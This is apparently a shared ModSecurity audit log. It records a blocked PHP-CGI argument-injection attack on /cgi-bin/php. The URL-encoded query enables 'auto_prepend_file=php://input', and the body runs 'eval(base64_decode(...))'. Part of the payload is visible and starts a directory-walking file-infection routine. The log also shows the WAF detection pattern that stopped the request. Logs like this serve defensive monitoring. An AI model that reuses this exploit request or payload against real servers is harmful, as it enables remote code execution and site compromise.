@derhansen
Created November 11, 2013 09:19
ModSecurity audit log stripped
--dafe1c1b-A--
[10/Nov/2013:07:44:03 +0100] Un8rMgqXZAQAACKaBUkAAAAC xxx.xxx.xxx.xxx 50937 xxx.xxx.xxx.xxx
--dafe1c1b-B--
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: xxxxxxxxxx.tld
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
Content-Length: 6013
Connection: close
--dafe1c1b-C--
<?PHP eval(base64_decode('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')); ?>
--dafe1c1b-F--
--dafe1c1b-H--
Message: Access denied with code 403 (phase 2). Pattern match "<\\?(?!xml)" at ARGS_NAMES:<?PHP eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBkb0RpcmVjdG9yeSgkZGlyLCAkc2hlbGxDb2RlKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBhcyAkZmlsZSkKCXsKCQlpZihpc19kaXIoJGZpbGUpICYmICRmaWxlIDw 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
Action: Intercepted (phase 2)
Stopwatch: 1384065842987057 134082 (- - -)
Stopwatch2: 1384065842987057 134082; combined=14809, p1=634, p2=14087, p3=0, p4=0, p5=87, sr=95, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.7.4 (http://www.modsecurity.org/); OWASP_CRS/2.2.7.
Server: Apache
Engine-Mode: "ENABLED"